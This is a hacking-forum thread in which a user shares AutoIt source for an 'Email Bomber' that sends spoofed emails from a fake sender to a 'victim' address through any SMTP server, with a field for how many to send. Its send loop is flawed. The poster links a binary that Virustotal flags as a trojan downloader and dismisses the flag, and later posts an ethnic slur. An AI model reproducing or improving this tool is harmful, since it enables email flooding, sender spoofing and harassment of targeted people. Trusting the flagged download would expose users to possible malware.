[AutoIT] Risker's SMPT Email Bomber

This is a discussion on [AutoIT] Risker's SMPT Email Bomber within the Development forum part of the Software/Hardware category; Code: #include <INet.au3> #include <GUIConstants.au3> #Region ### START Koda GUI section ### Form= $Form1 = GUICreate("Risker's ~ Email Bomber", 335, ...


+ Reply to Thread
Results 1 to 8 of 8

Thread: [AutoIT] Risker's SMPT Email Bomber

  1. risker is offline Banned User
    risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold
    Join Date
    Oct 2008
    Location
    Australia
    Posts
    2,852
    Downloads
    2
    Uploads
    2
    Rep Power
    0
    Reputation
    671

    [AutoIT] Risker's SMPT Email Bomber

    Code:
    #include <INet.au3>
    
    #include <GUIConstants.au3>
    
    #Region ### START Koda GUI section ### Form=
    $Form1 = GUICreate("Risker's ~ Email Bomber", 335, 326, 193, 124)
    $Group1 = GUICtrlCreateGroup("Email Specs", 8, 8, 313, 137)
    $Label2 = GUICtrlCreateLabel("Your fake email", 16, 48, 77, 17)
    $Label3 = GUICtrlCreateLabel("Victims Email", 16, 72, 65, 17)
    $Input1 = GUICtrlCreateInput("Server Name", 120, 24, 169, 21)
    $Yemail = GUICtrlCreateInput("Risker@d3scene.com", 120, 48, 169, 21)
    $Vemail = GUICtrlCreateInput("Zack@d3scene.com", 120, 72, 169, 21)
    $Label1 = GUICtrlCreateLabel("SMTP Server ", 16, 24, 71, 17)
    $Label6 = GUICtrlCreateLabel("Your fake name goes here", 16, 104, 79, 17)
    $Input3 = GUICtrlCreateInput("Risker D3scene.com", 120, 104, 169, 21)
    GUICtrlCreateGroup("", -99, -99, 1, 1)
    $Group2 = GUICtrlCreateGroup("Email Info", 8, 152, 313, 121)
    $Label4 = GUICtrlCreateLabel("Title", 16, 176, 24, 17)
    $Input2 = GUICtrlCreateInput("Untitled", 80, 176, 233, 21)
    $Label5 = GUICtrlCreateLabel("Subject", 16, 208, 40, 17)
    $Input4 = GUICtrlCreateInput("Untitled", 80, 208, 233, 21)
    $Body = GUICtrlCreateLabel("Body", 16, 240, 28, 17)
    $Input5 = GUICtrlCreateInput("Body of email goes here", 80, 240, 233, 21)
    GUICtrlCreateGroup("", -99, -99, 1, 1)
    $Button1 = GUICtrlCreateButton("Send Send!!", 256, 280, 65, 33, 0)
    $Label7 = GUICtrlCreateLabel("How many would you like to send?", 8, 288, 168, 17)
    $Input6 = GUICtrlCreateInput("20", 192, 288, 57, 21)
    GUISetState(@SW_SHOW)
    #EndRegion ### END Koda GUI section ###
    
    While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
    Case $GUI_EVENT_CLOSE
    Exit
    case $button1
        start()
    EndSwitch
    WEnd
    
    
    
    func start()
    $s_SmtpServer = guictrlread($input1)
    $s_FromName = guictrlread($input3)
    $s_FromAddress = guictrlread($yemail)
    $s_ToAddress = guictrlread($vemail)
    $s_Subject = guictrlread($input4)
    $as_Body = guictrlread($input2)
    
    Do
        $i = 0
    $Response = _INetSmtpMail ($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject, $as_Body)
    $i = $i + 1
    
    if @error Then
        msgbox (1,"Error","An Error has occured" & @crlf & @crlf & "Please double check every field filled out and/or try a different Smtp server")
    ExitLoop
    endif
    until $i = 1
    
    $err = @error
    If $Response = 1 Then
        MsgBox(0, "Success!!", "Mail sent")
    Else
        MsgBox(0, "Error!", "Mail failed with error code " & $err)
    EndIf
    endfunc
    
    Rapidshare Link
    Virustotal. MD5: feae7f7eff9c4778f48363c59914c467 Suspicious File Trojan/Downloader.AutoIt.ib
    It's virus free but yea.. Lol

  2. risker is offline Banned User
    risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold
    Join Date
    Oct 2008
    Location
    Australia
    Posts
    2,852
    Downloads
    2
    Uploads
    2
    Rep Power
    0
    Reputation
    671
    No one likes it? ;(

  3. beebee's Avatar
    beebee is offline Mentor
    beebee is on a distinguished road
    Join Date
    Dec 2008
    Posts
    125
    Downloads
    4
    Uploads
    0
    Rep Power
    2
    Reputation
    16
    hahaha + rep for the source
    http://www.bummerman.co.cc

  4. Sky_King's Avatar
    Sky_King is offline Hacker
    Sky_King will become famous soon enough Sky_King will become famous soon enough
    Join Date
    Mar 2009
    Location
    In the US now
    Posts
    181
    Downloads
    8
    Uploads
    0
    Rep Power
    1
    Reputation
    143
    Thank you!
    We love open source

  5. risker is offline Banned User
    risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold risker is a splendid one to behold
    Join Date
    Oct 2008
    Location
    Australia
    Posts
    2,852
    Downloads
    2
    Uploads
    2
    Rep Power
    0
    Reputation
    671
    Psh no loves on my program D;
    Just me source!

    thieving arabs!!!

  6. Serverman's Avatar
    Serverman is online now Paranoia!

    Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of
    Join Date
    Jan 2008
    Posts
    2,928
    Downloads
    19
    Uploads
    0
    Rep Power
    9
    Reputation
    1091
    Opensource <3 (Ill make my spammers myself, thank you )

    D3scene - Full of normal people

  7. gulp is offline Wannabe Member
    gulp is an unknown quantity at this point
    Join Date
    Jan 2009
    Posts
    25
    Downloads
    12
    Uploads
    0
    Rep Power
    2
    Reputation
    1
    this is to send mass messages to someone;s email right ?

  8. sk8erboi's Avatar
    sk8erboi is offline Guru
    sk8erboi is an unknown quantity at this point
    Join Date
    Mar 2009
    Location
    us
    Posts
    75
    Downloads
    19
    Uploads
    0
    Rep Power
    1
    Reputation
    9
    thanks for sharing...

    let me try this and then reply....

+ Reply to Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts